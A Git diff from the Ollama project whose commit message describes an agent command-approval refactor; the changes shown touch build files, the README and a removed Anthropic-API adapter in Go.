refactor(agent): implement three-tier approval system with warn patterns

- Remove git commands from auto-allowlist
- Add new warn patterns tier for commands requiring explicit approval
- Move network commands and env files from deny to warn
- Add IsWarn() and containsWord() helper functions
- Enhance git prefix extraction for granular allowlisting
- Move credential path patterns to denyPathPatterns
- UI improvements: dynamic warning messages and allowlist info
- Update tests: add TestIsWarn(), adjust expectations
2026-01-19 21:08:16 -05:00 · 2026-01-09 00:10:10 -08:00
152 changed files with 1781 additions and 29766 deletions
--- a/.github/ISSUE_TEMPLATE/10_bug_report.yml
+++ b/.github/ISSUE_TEMPLATE/10_bug_report.yml
@@ -13,7 +13,7 @@ body:
    id: logs
    attributes:
      label: Relevant log output
-      description: Please copy and paste any relevant log output. See [Troubleshooting Guide](https://github.com/ollama/ollama/blob/main/docs/troubleshooting.mdx#how-to-troubleshoot-issues) for details.
+      description: Please copy and paste any relevant log output. See [Troubleshooting Guide](https://github.com/ollama/ollama/blob/main/docs/troubleshooting.md#how-to-troubleshoot-issues) for details.
      render: shell
    validations:
      required: false
--- a/.github/workflows/release.yaml
+++ b/.github/workflows/release.yaml
@@ -372,17 +372,13 @@ jobs:
          outputs: type=local,dest=dist/${{ matrix.os }}-${{ matrix.arch }}
          cache-from: type=registry,ref=${{ vars.DOCKER_REPO }}:latest
          cache-to: type=inline
-      - name: Deduplicate CUDA libraries
-        run: |
-          ./scripts/deduplicate_cuda_libs.sh dist/${{ matrix.os }}-${{ matrix.arch }}
      - run: |
          for COMPONENT in bin/* lib/ollama/*; do
            case "$COMPONENT" in
-              bin/ollama*)               echo $COMPONENT >>ollama-${{ matrix.os }}-${{ matrix.arch }}.tar.in ;;
+              bin/ollama)                echo $COMPONENT >>ollama-${{ matrix.os }}-${{ matrix.arch }}.tar.in ;;
              lib/ollama/*.so*)          echo $COMPONENT >>ollama-${{ matrix.os }}-${{ matrix.arch }}.tar.in ;;
              lib/ollama/cuda_v*)        echo $COMPONENT >>ollama-${{ matrix.os }}-${{ matrix.arch }}.tar.in ;;
              lib/ollama/vulkan*)        echo $COMPONENT >>ollama-${{ matrix.os }}-${{ matrix.arch }}.tar.in ;;
-              lib/ollama/mlx*)           echo $COMPONENT >>ollama-${{ matrix.os }}-${{ matrix.arch }}.tar.in ;;
              lib/ollama/cuda_jetpack5)  echo $COMPONENT >>ollama-${{ matrix.os }}-${{ matrix.arch }}-jetpack5.tar.in ;;
              lib/ollama/cuda_jetpack6)  echo $COMPONENT >>ollama-${{ matrix.os }}-${{ matrix.arch }}-jetpack6.tar.in ;;
              lib/ollama/rocm)           echo $COMPONENT >>ollama-${{ matrix.os }}-${{ matrix.arch }}-rocm.tar.in ;;
--- a/CMakeLists.txt
+++ b/CMakeLists.txt
@@ -48,10 +48,9 @@ if((CMAKE_OSX_ARCHITECTURES AND NOT CMAKE_OSX_ARCHITECTURES MATCHES "arm64")
    set(GGML_CPU_ALL_VARIANTS ON)
 endif()

-if(APPLE)
+if (CMAKE_OSX_ARCHITECTURES MATCHES "x86_64")
    set(CMAKE_BUILD_RPATH "@loader_path")
    set(CMAKE_INSTALL_RPATH "@loader_path")
-    set(CMAKE_BUILD_WITH_INSTALL_RPATH ON)
 endif()

 set(OLLAMA_BUILD_DIR ${CMAKE_BINARY_DIR}/lib/ollama)
@@ -190,21 +189,13 @@ if(MLX_ENGINE)
    install(TARGETS mlx mlxc
        RUNTIME_DEPENDENCIES
            DIRECTORIES ${CUDAToolkit_BIN_DIR} ${CUDAToolkit_BIN_DIR}/x64 ${CUDAToolkit_LIBRARY_DIR}
-            PRE_INCLUDE_REGEXES cublas cublasLt cudart nvrtc nvrtc-builtins cudnn nccl openblas gfortran
+            PRE_INCLUDE_REGEXES cublas cublasLt cudart nvrtc cudnn nccl
            PRE_EXCLUDE_REGEXES ".*"
        RUNTIME DESTINATION ${OLLAMA_INSTALL_DIR} COMPONENT MLX
        LIBRARY DESTINATION ${OLLAMA_INSTALL_DIR} COMPONENT MLX
        FRAMEWORK DESTINATION ${OLLAMA_INSTALL_DIR} COMPONENT MLX
    )

-    # Install the Metal library for macOS arm64 (must be colocated with the binary)
-    # Metal backend is only built for arm64, not x86_64
-    if(APPLE AND CMAKE_SYSTEM_PROCESSOR STREQUAL "arm64")
-        install(FILES ${CMAKE_BINARY_DIR}/_deps/mlx-build/mlx/backend/metal/kernels/mlx.metallib
-            DESTINATION ${OLLAMA_INSTALL_DIR}
-            COMPONENT MLX)
-    endif()
-
    # Manually install cudart and cublas since they might not be picked up as direct dependencies
    if(CUDAToolkit_FOUND)
        file(GLOB CUDART_LIBS
--- a/21
+++ b/21
@@ -32,7 +32,7 @@ ENV PATH=/${VULKANVERSION}/x86_64/bin:$PATH
 FROM --platform=linux/arm64 almalinux:8 AS base-arm64
 # install epel-release for ccache
 RUN yum install -y yum-utils epel-release \
-    && dnf install -y clang ccache git \
+    && dnf install -y clang ccache \
    && yum-config-manager --add-repo https://developer.download.nvidia.com/compute/cuda/repos/rhel8/sbsa/cuda-rhel8.repo
 ENV CC=clang CXX=clang++

@@ -149,7 +149,6 @@ COPY CMakeLists.txt CMakePresets.json .
 COPY ml/backend/ggml/ggml ml/backend/ggml/ggml
 COPY x/ml/backend/mlx x/ml/backend/mlx
 COPY go.mod go.sum .
-COPY MLX_VERSION .
 RUN curl -fsSL https://golang.org/dl/go$(awk '/^go/ { print $2 }' go.mod).linux-$(case $(uname -m) in x86_64) echo amd64 ;; aarch64) echo arm64 ;; esac).tar.gz | tar xz -C /usr/local
 ENV PATH=/usr/local/go/bin:$PATH
 RUN go mod download
@@ -157,6 +156,15 @@ RUN --mount=type=cache,target=/root/.ccache \
    cmake --preset 'MLX CUDA 13' -DBLAS_INCLUDE_DIRS=/usr/include/openblas -DLAPACK_INCLUDE_DIRS=/usr/include/openblas \
        && cmake --build --parallel ${PARALLEL} --preset 'MLX CUDA 13' \
        && cmake --install build --component MLX --strip --parallel ${PARALLEL}
+COPY . .
+ARG GOFLAGS="'-ldflags=-w -s'"
+ENV CGO_ENABLED=1
+ARG CGO_CFLAGS
+ARG CGO_CXXFLAGS
+# TODO wire up the actual MLX engine here instead of building the main binary...
+RUN mkdir -p dist/bin
+RUN go build -tags mlx -trimpath -buildmode=pie -o dist/bin/imagegen ./x/imagegen/cmd/engine
+

 FROM base AS build
 WORKDIR /go/src/github.com/ollama/ollama
@@ -165,14 +173,12 @@ RUN curl -fsSL https://golang.org/dl/go$(awk '/^go/ { print $2 }' go.mod).linux-
 ENV PATH=/usr/local/go/bin:$PATH
 RUN go mod download
 COPY . .
-# Clone mlx-c headers for CGO (version from MLX_VERSION file)
-RUN git clone --depth 1 --branch "$(cat MLX_VERSION)" https://github.com/ml-explore/mlx-c.git build/_deps/mlx-c-src
 ARG GOFLAGS="'-ldflags=-w -s'"
 ENV CGO_ENABLED=1
-ENV CGO_CFLAGS="-I/go/src/github.com/ollama/ollama/build/_deps/mlx-c-src"
+ARG CGO_CFLAGS
 ARG CGO_CXXFLAGS
 RUN --mount=type=cache,target=/root/.cache/go-build \
-    go build -tags mlx -trimpath -buildmode=pie -o /bin/ollama .
+    go build -trimpath -buildmode=pie -o /bin/ollama .

 FROM --platform=linux/amd64 scratch AS amd64
 # COPY --from=cuda-11 dist/lib/ollama/ /lib/ollama/
@@ -180,6 +186,7 @@ COPY --from=cuda-12 dist/lib/ollama /lib/ollama/
 COPY --from=cuda-13 dist/lib/ollama /lib/ollama/
 COPY --from=vulkan  dist/lib/ollama  /lib/ollama/
 COPY --from=mlx     /go/src/github.com/ollama/ollama/dist/lib/ollama /lib/ollama/
+COPY --from=mlx     /go/src/github.com/ollama/ollama/dist/bin/ /bin/

 FROM --platform=linux/arm64 scratch AS arm64
 # COPY --from=cuda-11 dist/lib/ollama/ /lib/ollama/
@@ -198,7 +205,7 @@ COPY --from=build /bin/ollama /bin/ollama

 FROM ubuntu:24.04
 RUN apt-get update \
-    && apt-get install -y ca-certificates libvulkan1 libopenblas0 \
+    && apt-get install -y ca-certificates libvulkan1 \
    && apt-get clean \
    && rm -rf /var/lib/apt/lists/*
 COPY --from=archive /bin /usr/bin
--- a/1
+++ b/1
@@ -1 +0,0 @@
-v0.4.1
--- a/README.md
+++ b/README.md
@@ -48,7 +48,7 @@ ollama run gemma3

 ## Model library

-Ollama supports a list of models available on [ollama.com/library](https://ollama.com/library "ollama model library")
+Ollama supports a list of models available on [ollama.com/library](https://ollama.com/library 'ollama model library')

 Here are some example models that can be downloaded:

@@ -79,7 +79,7 @@ Here are some example models that can be downloaded:
 | Code Llama         | 7B         | 3.8GB | `ollama run codellama`           |
 | Llama 2 Uncensored | 7B         | 3.8GB | `ollama run llama2-uncensored`   |
 | LLaVA              | 7B         | 4.5GB | `ollama run llava`               |
-| Granite-3.3        | 8B         | 4.9GB | `ollama run granite3.3`          |
+| Granite-3.3         | 8B         | 4.9GB | `ollama run granite3.3`          |

 > [!NOTE]
 > You should have at least 8 GB of RAM available to run the 7B models, 16 GB to run the 13B models, and 32 GB to run the 33B models.
@@ -260,38 +260,6 @@ Finally, in a separate shell, run a model:
 ./ollama run llama3.2
 ```

-## Building with MLX (experimental)
-
-First build the MLX libraries:
-
-```shell
-cmake --preset MLX
-cmake --build --preset MLX --parallel
-cmake --install build --component MLX
-```
-
-When building with the `-tags mlx` flag, the main `ollama` binary includes MLX support for experimental features like image generation:
-
-```shell
-go build -tags mlx .
-```
-
-Finally, start the server:
-
-```
-./ollama serve
-```
-
-### Building MLX with CUDA
-
-When building with CUDA, use the preset "MLX CUDA 13" or "MLX CUDA 12" to enable CUDA with default architectures:
-
-```shell
-cmake --preset 'MLX CUDA 13'
-cmake --build --preset 'MLX CUDA 13' --parallel
-cmake --install build --component MLX
-```
-
 ## REST API

 Ollama has a REST API for running and managing models.
@@ -322,7 +290,6 @@ See the [API documentation](./docs/api.md) for all endpoints.

 ### Web & Desktop

- [Onyx](https://github.com/onyx-dot-app/onyx)
 - [Open WebUI](https://github.com/open-webui/open-webui)
 - [SwiftChat (macOS with ReactNative)](https://github.com/aws-samples/swift-chat)
 - [Enchanted (macOS native)](https://github.com/AugustDev/enchanted)
@@ -454,7 +421,7 @@ See the [API documentation](./docs/api.md) for all endpoints.
 - [AppFlowy](https://github.com/AppFlowy-IO/AppFlowy) (AI collaborative workspace with Ollama, cross-platform and self-hostable)
 - [Lumina](https://github.com/cushydigit/lumina.git) (A lightweight, minimal React.js frontend for interacting with Ollama servers)
 - [Tiny Notepad](https://pypi.org/project/tiny-notepad) (A lightweight, notepad-like interface to chat with ollama available on PyPI)
- [macLlama (macOS native)](https://github.com/hellotunamayo/macLlama) (A native macOS GUI application for interacting with Ollama models, featuring a chat interface.)
+- [macLlama (macOS native)](https://github.com/hellotunamayo/macLlama) (A native macOS GUI application for interacting with Ollama models, featuring a chat interface.) 
 - [GPTranslate](https://github.com/philberndt/GPTranslate) (A fast and lightweight, AI powered desktop translation application written with Rust and Tauri. Features real-time translation with OpenAI/Azure/Ollama.)
 - [ollama launcher](https://github.com/NGC13009/ollama-launcher) (A launcher for Ollama, aiming to provide users with convenient functions such as ollama server launching, management, or configuration.)
 - [ai-hub](https://github.com/Aj-Seven/ai-hub) (AI Hub supports multiple models via API keys and Chat support via Ollama API.)
@@ -526,7 +493,7 @@ See the [API documentation](./docs/api.md) for all endpoints.
 ### Database

 - [pgai](https://github.com/timescale/pgai) - PostgreSQL as a vector database (Create and search embeddings from Ollama models using pgvector)
-  - [Get started guide](https://github.com/timescale/pgai/blob/main/docs/vectorizer-quick-start.md)
+   - [Get started guide](https://github.com/timescale/pgai/blob/main/docs/vectorizer-quick-start.md)
 - [MindsDB](https://github.com/mindsdb/mindsdb/blob/staging/mindsdb/integrations/handlers/ollama_handler/README.md) (Connects Ollama models with nearly 200 data platforms and apps)
 - [chromem-go](https://github.com/philippgille/chromem-go/blob/v0.5.0/embed_ollama.go) with [example](https://github.com/philippgille/chromem-go/tree/v0.5.0/examples/rag-wikipedia-ollama)
 - [Kangaroo](https://github.com/dbkangaroo/kangaroo) (AI-powered SQL client and admin tool for popular databases)
@@ -669,7 +636,6 @@ See the [API documentation](./docs/api.md) for all endpoints.
 - [llama.cpp](https://github.com/ggml-org/llama.cpp) project founded by Georgi Gerganov.

 ### Observability
-
 - [Opik](https://www.comet.com/docs/opik/cookbook/ollama) is an open-source platform to debug, evaluate, and monitor your LLM applications, RAG systems, and agentic workflows with comprehensive tracing, automated evaluations, and production-ready dashboards. Opik supports native integration to Ollama.
 - [Lunary](https://lunary.ai/docs/integrations/ollama) is the leading open-source LLM observability platform. It provides a variety of enterprise-grade features such as real-time analytics, prompt templates management, PII masking, and comprehensive agent tracing.
 - [OpenLIT](https://github.com/openlit/openlit) is an OpenTelemetry-native tool for monitoring Ollama Applications & GPUs using traces and metrics.
@@ -678,5 +644,4 @@ See the [API documentation](./docs/api.md) for all endpoints.
 - [MLflow Tracing](https://mlflow.org/docs/latest/llms/tracing/index.html#automatic-tracing) is an open source LLM observability tool with a convenient API to log and visualize traces, making it easy to debug and evaluate GenAI applications.

 ### Security
-
 - [Ollama Fortress](https://github.com/ParisNeo/ollama_proxy_server)
--- a/anthropic/anthropic.go
+++ b/anthropic/anthropic.go
@@ -1,778 +0,0 @@
-package anthropic
-
-import (
-	"crypto/rand"
-	"encoding/base64"
-	"encoding/json"
-	"errors"
-	"fmt"
-	"log/slog"
-	"net/http"
-	"strings"
-	"time"
-
-	"github.com/ollama/ollama/api"
-)
-
-// Error types matching Anthropic API
-type Error struct {
-	Type    string `json:"type"`
-	Message string `json:"message"`
-}
-
-type ErrorResponse struct {
-	Type      string `json:"type"` // always "error"
-	Error     Error  `json:"error"`
-	RequestID string `json:"request_id,omitempty"`
-}
-
-// NewError creates a new ErrorResponse with the appropriate error type based on HTTP status code
-func NewError(code int, message string) ErrorResponse {
-	var etype string
-	switch code {
-	case http.StatusBadRequest:
-		etype = "invalid_request_error"
-	case http.StatusUnauthorized:
-		etype = "authentication_error"
-	case http.StatusForbidden:
-		etype = "permission_error"
-	case http.StatusNotFound:
-		etype = "not_found_error"
-	case http.StatusTooManyRequests:
-		etype = "rate_limit_error"
-	case http.StatusServiceUnavailable, 529:
-		etype = "overloaded_error"
-	default:
-		etype = "api_error"
-	}
-
-	return ErrorResponse{
-		Type:      "error",
-		Error:     Error{Type: etype, Message: message},
-		RequestID: generateID("req"),
-	}
-}
-
-// Request types
-
-// MessagesRequest represents an Anthropic Messages API request
-type MessagesRequest struct {
-	Model         string          `json:"model"`
-	MaxTokens     int             `json:"max_tokens"`
-	Messages      []MessageParam  `json:"messages"`
-	System        any             `json:"system,omitempty"` // string or []ContentBlock
-	Stream        bool            `json:"stream,omitempty"`
-	Temperature   *float64        `json:"temperature,omitempty"`
-	TopP          *float64        `json:"top_p,omitempty"`
-	TopK          *int            `json:"top_k,omitempty"`
-	StopSequences []string        `json:"stop_sequences,omitempty"`
-	Tools         []Tool          `json:"tools,omitempty"`
-	ToolChoice    *ToolChoice     `json:"tool_choice,omitempty"`
-	Thinking      *ThinkingConfig `json:"thinking,omitempty"`
-	Metadata      *Metadata       `json:"metadata,omitempty"`
-}
-
-// MessageParam represents a message in the request
-type MessageParam struct {
-	Role    string `json:"role"`    // "user" or "assistant"
-	Content any    `json:"content"` // string or []ContentBlock
-}
-
-// ContentBlock represents a content block in a message.
-// Text and Thinking use pointers so they serialize as the field being present (even if empty)
-// only when set, which is required for SDK streaming accumulation.
-type ContentBlock struct {
-	Type string `json:"type"` // text, image, tool_use, tool_result, thinking
-
-	// For text blocks - pointer so field only appears when set (SDK requires it for accumulation)
-	Text *string `json:"text,omitempty"`
-
-	// For image blocks
-	Source *ImageSource `json:"source,omitempty"`
-
-	// For tool_use blocks
-	ID    string `json:"id,omitempty"`
-	Name  string `json:"name,omitempty"`
-	Input any    `json:"input,omitempty"`
-
-	// For tool_result blocks
-	ToolUseID string `json:"tool_use_id,omitempty"`
-	Content   any    `json:"content,omitempty"` // string or []ContentBlock
-	IsError   bool   `json:"is_error,omitempty"`
-
-	// For thinking blocks - pointer so field only appears when set (SDK requires it for accumulation)
-	Thinking  *string `json:"thinking,omitempty"`
-	Signature string  `json:"signature,omitempty"`
-}
-
-// ImageSource represents the source of an image
-type ImageSource struct {
-	Type      string `json:"type"` // "base64" or "url"
-	MediaType string `json:"media_type,omitempty"`
-	Data      string `json:"data,omitempty"`
-	URL       string `json:"url,omitempty"`
-}
-
-// Tool represents a tool definition
-type Tool struct {
-	Type        string          `json:"type,omitempty"` // "custom" for user-defined tools
-	Name        string          `json:"name"`
-	Description string          `json:"description,omitempty"`
-	InputSchema json.RawMessage `json:"input_schema,omitempty"`
-}
-
-// ToolChoice controls how the model uses tools
-type ToolChoice struct {
-	Type                   string `json:"type"` // "auto", "any", "tool", "none"
-	Name                   string `json:"name,omitempty"`
-	DisableParallelToolUse bool   `json:"disable_parallel_tool_use,omitempty"`
-}
-
-// ThinkingConfig controls extended thinking
-type ThinkingConfig struct {
-	Type         string `json:"type"` // "enabled" or "disabled"
-	BudgetTokens int    `json:"budget_tokens,omitempty"`
-}
-
-// Metadata for the request
-type Metadata struct {
-	UserID string `json:"user_id,omitempty"`
-}
-
-// Response types
-
-// MessagesResponse represents an Anthropic Messages API response
-type MessagesResponse struct {
-	ID           string         `json:"id"`
-	Type         string         `json:"type"` // "message"
-	Role         string         `json:"role"` // "assistant"
-	Model        string         `json:"model"`
-	Content      []ContentBlock `json:"content"`
-	StopReason   string         `json:"stop_reason,omitempty"`
-	StopSequence string         `json:"stop_sequence,omitempty"`
-	Usage        Usage          `json:"usage"`
-}
-
-// Usage contains token usage information
-type Usage struct {
-	InputTokens  int `json:"input_tokens"`
-	OutputTokens int `json:"output_tokens"`
-}
-
-// Streaming event types
-
-// MessageStartEvent is sent at the start of streaming
-type MessageStartEvent struct {
-	Type    string           `json:"type"` // "message_start"
-	Message MessagesResponse `json:"message"`
-}
-
-// ContentBlockStartEvent signals the start of a content block
-type ContentBlockStartEvent struct {
-	Type         string       `json:"type"` // "content_block_start"
-	Index        int          `json:"index"`
-	ContentBlock ContentBlock `json:"content_block"`
-}
-
-// ContentBlockDeltaEvent contains incremental content updates
-type ContentBlockDeltaEvent struct {
-	Type  string `json:"type"` // "content_block_delta"
-	Index int    `json:"index"`
-	Delta Delta  `json:"delta"`
-}
-
-// Delta represents an incremental update
-type Delta struct {
-	Type        string `json:"type"` // "text_delta", "input_json_delta", "thinking_delta", "signature_delta"
-	Text        string `json:"text,omitempty"`
-	PartialJSON string `json:"partial_json,omitempty"`
-	Thinking    string `json:"thinking,omitempty"`
-	Signature   string `json:"signature,omitempty"`
-}
-
-// ContentBlockStopEvent signals the end of a content block
-type ContentBlockStopEvent struct {
-	Type  string `json:"type"` // "content_block_stop"
-	Index int    `json:"index"`
-}
-
-// MessageDeltaEvent contains updates to the message
-type MessageDeltaEvent struct {
-	Type  string       `json:"type"` // "message_delta"
-	Delta MessageDelta `json:"delta"`
-	Usage DeltaUsage   `json:"usage"`
-}
-
-// MessageDelta contains stop information
-type MessageDelta struct {
-	StopReason   string `json:"stop_reason,omitempty"`
-	StopSequence string `json:"stop_sequence,omitempty"`
-}
-
-// DeltaUsage contains cumulative token usage
-type DeltaUsage struct {
-	OutputTokens int `json:"output_tokens"`
-}
-
-// MessageStopEvent signals the end of the message
-type MessageStopEvent struct {
-	Type string `json:"type"` // "message_stop"
-}
-
-// PingEvent is a keepalive event
-type PingEvent struct {
-	Type string `json:"type"` // "ping"
-}
-
-// StreamErrorEvent is an error during streaming
-type StreamErrorEvent struct {
-	Type  string `json:"type"` // "error"
-	Error Error  `json:"error"`
-}
-
-// FromMessagesRequest converts an Anthropic MessagesRequest to an Ollama api.ChatRequest
-func FromMessagesRequest(r MessagesRequest) (*api.ChatRequest, error) {
-	var messages []api.Message
-
-	if r.System != nil {
-		switch sys := r.System.(type) {
-		case string:
-			if sys != "" {
-				messages = append(messages, api.Message{Role: "system", Content: sys})
-			}
-		case []any:
-			// System can be an array of content blocks
-			var content strings.Builder
-			for _, block := range sys {
-				if blockMap, ok := block.(map[string]any); ok {
-					if blockMap["type"] == "text" {
-						if text, ok := blockMap["text"].(string); ok {
-							content.WriteString(text)
-						}
-					}
-				}
-			}
-			if content.Len() > 0 {
-				messages = append(messages, api.Message{Role: "system", Content: content.String()})
-			}
-		}
-	}
-
-	for _, msg := range r.Messages {
-		converted, err := convertMessage(msg)
-		if err != nil {
-			return nil, err
-		}
-		messages = append(messages, converted...)
-	}
-
-	options := make(map[string]any)
-
-	options["num_predict"] = r.MaxTokens
-
-	if r.Temperature != nil {
-		options["temperature"] = *r.Temperature
-	}
-
-	if r.TopP != nil {
-		options["top_p"] = *r.TopP
-	}
-
-	if r.TopK != nil {
-		options["top_k"] = *r.TopK
-	}
-
-	if len(r.StopSequences) > 0 {
-		options["stop"] = r.StopSequences
-	}
-
-	var tools api.Tools
-	for _, t := range r.Tools {
-		tool, err := convertTool(t)
-		if err != nil {
-			return nil, err
-		}
-		tools = append(tools, tool)
-	}
-
-	var think *api.ThinkValue
-	if r.Thinking != nil && r.Thinking.Type == "enabled" {
-		think = &api.ThinkValue{Value: true}
-	}
-
-	stream := r.Stream
-
-	return &api.ChatRequest{
-		Model:    r.Model,
-		Messages: messages,
-		Options:  options,
-		Stream:   &stream,
-		Tools:    tools,
-		Think:    think,
-	}, nil
-}
-
-// convertMessage converts an Anthropic MessageParam to Ollama api.Message(s)
-func convertMessage(msg MessageParam) ([]api.Message, error) {
-	var messages []api.Message
-	role := strings.ToLower(msg.Role)
-
-	switch content := msg.Content.(type) {
-	case string:
-		messages = append(messages, api.Message{Role: role, Content: content})
-
-	case []any:
-		var textContent strings.Builder
-		var images []api.ImageData
-		var toolCalls []api.ToolCall
-		var thinking string
-		var toolResults []api.Message
-
-		for _, block := range content {
-			blockMap, ok := block.(map[string]any)
-			if !ok {
-				return nil, errors.New("invalid content block format")
-			}
-
-			blockType, _ := blockMap["type"].(string)
-
-			switch blockType {
-			case "text":
-				if text, ok := blockMap["text"].(string); ok {
-					textContent.WriteString(text)
-				}
-
-			case "image":
-				source, ok := blockMap["source"].(map[string]any)
-				if !ok {
-					return nil, errors.New("invalid image source")
-				}
-
-				sourceType, _ := source["type"].(string)
-				if sourceType == "base64" {
-					data, _ := source["data"].(string)
-					decoded, err := base64.StdEncoding.DecodeString(data)
-					if err != nil {
-						return nil, fmt.Errorf("invalid base64 image data: %w", err)
-					}
-					images = append(images, decoded)
-				} else {
-					return nil, fmt.Errorf("invalid image source type: %s. Only base64 images are supported.", sourceType)
-				}
-				// URL images would need to be fetched - skip for now
-
-			case "tool_use":
-				id, ok := blockMap["id"].(string)
-				if !ok {
-					return nil, errors.New("tool_use block missing required 'id' field")
-				}
-				name, ok := blockMap["name"].(string)
-				if !ok {
-					return nil, errors.New("tool_use block missing required 'name' field")
-				}
-				tc := api.ToolCall{
-					ID: id,
-					Function: api.ToolCallFunction{
-						Name: name,
-					},
-				}
-				if input, ok := blockMap["input"].(map[string]any); ok {
-					tc.Function.Arguments = mapToArgs(input)
-				}
-				toolCalls = append(toolCalls, tc)
-
-			case "tool_result":
-				toolUseID, _ := blockMap["tool_use_id"].(string)
-				var resultContent string
-
-				switch c := blockMap["content"].(type) {
-				case string:
-					resultContent = c
-				case []any:
-					for _, cb := range c {
-						if cbMap, ok := cb.(map[string]any); ok {
-							if cbMap["type"] == "text" {
-								if text, ok := cbMap["text"].(string); ok {
-									resultContent += text
-								}
-							}
-						}
-					}
-				}
-
-				toolResults = append(toolResults, api.Message{
-					Role:       "tool",
-					Content:    resultContent,
-					ToolCallID: toolUseID,
-				})
-
-			case "thinking":
-				if t, ok := blockMap["thinking"].(string); ok {
-					thinking = t
-				}
-			}
-		}
-
-		if textContent.Len() > 0 || len(images) > 0 || len(toolCalls) > 0 || thinking != "" {
-			m := api.Message{
-				Role:      role,
-				Content:   textContent.String(),
-				Images:    images,
-				ToolCalls: toolCalls,
-				Thinking:  thinking,
-			}
-			messages = append(messages, m)
-		}
-
-		// Add tool results as separate messages
-		messages = append(messages, toolResults...)
-
-	default:
-		return nil, fmt.Errorf("invalid message content type: %T", content)
-	}
-
-	return messages, nil
-}
-
-// convertTool converts an Anthropic Tool to an Ollama api.Tool
-func convertTool(t Tool) (api.Tool, error) {
-	var params api.ToolFunctionParameters
-	if len(t.InputSchema) > 0 {
-		if err := json.Unmarshal(t.InputSchema, &params); err != nil {
-			return api.Tool{}, fmt.Errorf("invalid input_schema for tool %q: %w", t.Name, err)
-		}
-	}
-
-	return api.Tool{
-		Type: "function",
-		Function: api.ToolFunction{
-			Name:        t.Name,
-			Description: t.Description,
-			Parameters:  params,
-		},
-	}, nil
-}
-
-// ToMessagesResponse converts an Ollama api.ChatResponse to an Anthropic MessagesResponse
-func ToMessagesResponse(id string, r api.ChatResponse) MessagesResponse {
-	var content []ContentBlock
-
-	if r.Message.Thinking != "" {
-		content = append(content, ContentBlock{
-			Type:     "thinking",
-			Thinking: ptr(r.Message.Thinking),
-		})
-	}
-
-	if r.Message.Content != "" {
-		content = append(content, ContentBlock{
-			Type: "text",
-			Text: ptr(r.Message.Content),
-		})
-	}
-
-	for _, tc := range r.Message.ToolCalls {
-		content = append(content, ContentBlock{
-			Type:  "tool_use",
-			ID:    tc.ID,
-			Name:  tc.Function.Name,
-			Input: tc.Function.Arguments,
-		})
-	}
-
-	stopReason := mapStopReason(r.DoneReason, len(r.Message.ToolCalls) > 0)
-
-	return MessagesResponse{
-		ID:         id,
-		Type:       "message",
-		Role:       "assistant",
-		Model:      r.Model,
-		Content:    content,
-		StopReason: stopReason,
-		Usage: Usage{
-			InputTokens:  r.Metrics.PromptEvalCount,
-			OutputTokens: r.Metrics.EvalCount,
-		},
-	}
-}
-
-// mapStopReason converts Ollama done_reason to Anthropic stop_reason
-func mapStopReason(reason string, hasToolCalls bool) string {
-	if hasToolCalls {
-		return "tool_use"
-	}
-
-	switch reason {
-	case "stop":
-		return "end_turn"
-	case "length":
-		return "max_tokens"
-	default:
-		if reason != "" {
-			return "stop_sequence"
-		}
-		return ""
-	}
-}
-
-// StreamConverter manages state for converting Ollama streaming responses to Anthropic format
-type StreamConverter struct {
-	ID              string
-	Model           string
-	firstWrite      bool
-	contentIndex    int
-	inputTokens     int
-	outputTokens    int
-	thinkingStarted bool
-	thinkingDone    bool
-	textStarted     bool
-	toolCallsSent   map[string]bool
-}
-
-func NewStreamConverter(id, model string) *StreamConverter {
-	return &StreamConverter{
-		ID:            id,
-		Model:         model,
-		firstWrite:    true,
-		toolCallsSent: make(map[string]bool),
-	}
-}
-
-// StreamEvent represents a streaming event to be sent to the client
-type StreamEvent struct {
-	Event string
-	Data  any
-}
-
-// Process converts an Ollama ChatResponse to Anthropic streaming events
-func (c *StreamConverter) Process(r api.ChatResponse) []StreamEvent {
-	var events []StreamEvent
-
-	if c.firstWrite {
-		c.firstWrite = false
-		c.inputTokens = r.Metrics.PromptEvalCount
-
-		events = append(events, StreamEvent{
-			Event: "message_start",
-			Data: MessageStartEvent{
-				Type: "message_start",
-				Message: MessagesResponse{
-					ID:      c.ID,
-					Type:    "message",
-					Role:    "assistant",
-					Model:   c.Model,
-					Content: []ContentBlock{},
-					Usage: Usage{
-						InputTokens:  c.inputTokens,
-						OutputTokens: 0,
-					},
-				},
-			},
-		})
-	}
-
-	if r.Message.Thinking != "" && !c.thinkingDone {
-		if !c.thinkingStarted {
-			c.thinkingStarted = true
-			events = append(events, StreamEvent{
-				Event: "content_block_start",
-				Data: ContentBlockStartEvent{
-					Type:  "content_block_start",
-					Index: c.contentIndex,
-					ContentBlock: ContentBlock{
-						Type:     "thinking",
-						Thinking: ptr(""),
-					},
-				},
-			})
-		}
-
-		events = append(events, StreamEvent{
-			Event: "content_block_delta",
-			Data: ContentBlockDeltaEvent{
-				Type:  "content_block_delta",
-				Index: c.contentIndex,
-				Delta: Delta{
-					Type:     "thinking_delta",
-					Thinking: r.Message.Thinking,
-				},
-			},
-		})
-	}
-
-	if r.Message.Content != "" {
-		if c.thinkingStarted && !c.thinkingDone {
-			c.thinkingDone = true
-			events = append(events, StreamEvent{
-				Event: "content_block_stop",
-				Data: ContentBlockStopEvent{
-					Type:  "content_block_stop",
-					Index: c.contentIndex,
-				},
-			})
-			c.contentIndex++
-		}
-
-		if !c.textStarted {
-			c.textStarted = true
-			events = append(events, StreamEvent{
-				Event: "content_block_start",
-				Data: ContentBlockStartEvent{
-					Type:  "content_block_start",
-					Index: c.contentIndex,
-					ContentBlock: ContentBlock{
-						Type: "text",
-						Text: ptr(""),
-					},
-				},
-			})
-		}
-
-		events = append(events, StreamEvent{
-			Event: "content_block_delta",
-			Data: ContentBlockDeltaEvent{
-				Type:  "content_block_delta",
-				Index: c.contentIndex,
-				Delta: Delta{
-					Type: "text_delta",
-					Text: r.Message.Content,
-				},
-			},
-		})
-	}
-
-	for _, tc := range r.Message.ToolCalls {
-		if c.toolCallsSent[tc.ID] {
-			continue
-		}
-
-		if c.textStarted {
-			events = append(events, StreamEvent{
-				Event: "content_block_stop",
-				Data: ContentBlockStopEvent{
-					Type:  "content_block_stop",
-					Index: c.contentIndex,
-				},
-			})
-			c.contentIndex++
-			c.textStarted = false
-		}
-
-		argsJSON, err := json.Marshal(tc.Function.Arguments)
-		if err != nil {
-			slog.Error("failed to marshal tool arguments", "error", err, "tool_id", tc.ID)
-			continue
-		}
-
-		events = append(events, StreamEvent{
-			Event: "content_block_start",
-			Data: ContentBlockStartEvent{
-				Type:  "content_block_start",
-				Index: c.contentIndex,
-				ContentBlock: ContentBlock{
-					Type:  "tool_use",
-					ID:    tc.ID,
-					Name:  tc.Function.Name,
-					Input: map[string]any{},
-				},
-			},
